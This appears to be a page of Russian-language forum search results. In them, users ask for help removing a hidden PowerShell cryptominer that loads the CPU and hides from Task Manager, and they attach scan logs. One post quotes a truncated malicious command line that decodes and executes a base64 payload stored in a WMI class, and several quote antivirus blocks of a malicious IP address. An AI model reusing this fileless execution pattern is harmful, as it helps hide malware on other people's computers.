Поиск сообщества

Здравствуйте, совсем недавно появилась проблема связанная с PowerShell. Примерно каждые 15 мин. эта командная строка запускается сама по себе, и из за этого выкидывает из приложений на раб. стол. Открывается и тут же пропадает, происходит это за секунду, но жутко надоедает когда сворачиваются приложения. В самой строке пусто, почему это происходит я так и не смог понять . Пытался найти решение в сети, ничего не помогло, наткнулся на вот такую статью "MSH/Cibyz не использует какой-либо уязвимости PowerShell, а эксплуатирует его функциональную возможность исполнять скрипты. Тем самым новый код

Оформлен инцидент INC000008415373, в двух словах продублирую здесь. На серверах с всевозможными версиями Windows Server обнаруживается работающий процесс powershell, грузящий процессор на 100%. Если процесс убить, то он потом снова запускается. Командные строки процессов отличаются, но типа этого: powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value; $funs = ([WmiClas*] 'root\default:Win32_TaskService').Properties['funs'].Value ; iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))); Invoke-Comman

Доброго дня. Прошу помочь очистить сеть из нескольких машин от вируса-майнера. Просканировал одну из машин утилитой KVRT, во вложении CollectionLog после проверки. Заранее спасибо. CollectionLog-2019.04.23-02.09.zip

Здравствуйте. Третий день Касперский блокирует переход PowerShell по вредоносной ссылке: Событие: Переход остановлен Пользователь: AMENO\Heller Тип пользователя: Активный пользователь Имя программы: powershell.exe Путь к программе: C:\Windows\System32\WindowsPowerShell\v1.0 Компонент: Веб-Антивирус Описание результата: Запрещено Тип: Вредоносная ссылка Название: 66.248.206.176 Точность: Точно Степень угрозы: Высокая Тип объекта: Веб-страница Имя объекта: update.php?i=g7LVNEq_1790 Путь к объекту: http://google.ru Причина: Kaspersky Security Network Дата вы

Добрый день. Появляется процесс powershell.exe, грузит ЦПУ и ГПУ. При открытии таск-менеджера прячется, приостанавливается вручную через process explorer, если прервать, возобновляется минут через 5. KVRT и CureIt ничего не находят, Malwarebytes - тоже. Возможно не связано, но перестал запускаться Outlook. CollectionLog-2021.11.22-12.32.zip

Здравствуйте, вот такая ситуация вторые сутки, поиск проблемы с помощью разных антивирусов не дал результата Событие: Переход остановлен Пользователь: DESKTOP-0CHI1MB\Мой Тип пользователя: Активный пользователь Имя программы: powershell.exe Путь к программе: C:\Windows\System32\WindowsPowerShell\v1.0 Компонент: Веб-Антивирус Описание результата: Запрещено Тип: Вредоносная ссылка Название: 66.248.206.176 Точность: Точно Степень угрозы: Высокая Тип объекта: Веб-страница Имя объекта: update.php?i=d1ygFMB_1380 Путь к объекту: http://google.ru Причина: Kaspersky Se

Здравствуйте! Каждые 20 минут Kaspersky Total Security фиксирует попытку PowerShell перейти на вредоносный сайт это происходит независимо от того открыт какой-нибудь браузер или нет. Полное сканирование ПК программой KTS вирусов не обнаружило. KVRT при сканировании указало 3 объекта - легальные программы которые могут быть использованы злоумышленниками... Помогите пожалуйста решить проблему! Лог после работы AutoLogger прилагаюCollectionLog-2021.11.20-17.08.zip

Последнее время появилась в диспетчере задача powershell.exe. Нагружает систему так, что даже браузер хром позавидует (Скрин скину ниже). Что мне делать? Сама программа не появляется, появляется только в диспетчере Очень надеюсь на вашу помощь

При открывании диспетчера задач прячется, видно только сторонним CollectionLog-2022.01.25-09.35.zip

Привет. Kaspersky Anti-Virus каждые 20 минут фиксирует попытку PowerShell перейти на вредоносный сайт Событие: Переход остановлен Пользователь: DESKTOP-HKUMLCG\gecta Тип пользователя: Активный пользователь Имя программы: powershell.exe Путь к программе: C:\Windows\System32\WindowsPowerShell\v1.0 Компонент: Веб-Антивирус Описание результата: Запрещено Тип: Вредоносная ссылка Название: 66.248.206.176 Точность: Точно Степень угрозы: Высокая Тип объекта: Веб-страница Имя объекта: update.php?i=bpj2fVZ_1380 Путь к объекту: http://google.ru Причина: Kaspersky Security

Server 2008r2 в списке процессов периодически появляются несколько процессов Powershell CollectionLog-2021.09.06-23.29.zip

Начну коротко и сразу: пару дней назад увидел в диспетчере задач Wasping (процесс), перешёл по расположению - удалил, больше не появлялся. Нашёл ещё какой-то майнер (загуглив выяснил что майнер), тоже удалил. После этого пк частенько начал грузить процессор или диск под 100%, процессами "System, Powershell (по три открывается, нагуглив узнал что это для скриптов, если сам не врубал - скорее всего вирус). Искал пару дней пордяд методы проверки вручную, перепробовал много, ничего не нашёл. Пк постоянно грузит. AVZ скан сделал, отчёт прикреплю. Антивирус Kaspersky Security Cloud сканировал, помог

powershell процесс грузит процессор под 100%. когда запускаешь диспетчер задач, он исчезает. виден только в process explorer. прошу помощи CollectionLog-2021.10.28-21.49.zip

Здравствуйте. Каждые пару недель появляется майнер в папке C:\ProgramData\Windows и недавно каждый час выскакивает Powershell троян, который автоматически гаситься авастом. CollectionLog-2021.10.27-01.23.zip

Здравствуйте. Заметил что в простое нагружается процессор на 60-70%. Открывая диспетчер задач, все резко приходило в норму, переставало грузить. Воспользовавшись сторонним диспетчером задач (при нем процесс не сбрасывался), выяснил что грузит powershell.exe который невозможно определить где находится. Помогите разобраться. Прилагаю логи и скрин из процессов. CollectionLog-2021.10.26-23.07.zip

Здравствуйте. Заметил что ноутбук начал шуметь в простое и нагружать процессор на 50-60 процентов, а нагрузка шла от программы Powershell, причем проверял в программе process explorer, потому что открывая просто диспетчер задач нагрузка процессора падала, а процесс powershell сбрасывался. Проверил антивирусом malware и drweb culteir и без результатно

Привет! Подхватил майнер, уже знаю откуда, больше не подхвачу. Прогнал через dr web cureit, он несколько файлов нашёл и удалил, но майнер остался. Потом пошёл через AutoLogger, там в планировщке 3 файла вредоносного скрипта в powershell. Я сделал скрипт для удаления, ввёл его в АВЗ, ребутнул компьютер. Потом снова прогнал через AutoLogger, там эти файлы всё равно остались. Видимо, что-то ещё нужно добавить в скрипт. Тут я уже не компетентен( Заранее большое спасибо! CollectionLog-2022.06.25-23.31.zip

Добрый день, есть проблема с процессом Powershell.exe, который грузит ЦПУ на 100%. При запуске диспетчера задач он пропадает, после закрытия диспетчера появляется вновь, потому невозможно определить где он находится. CureIt и другие утилиты ничего не находят. Пожалуйста, помогите разобраться. CollectionLog-2021.11.23-16.17.zip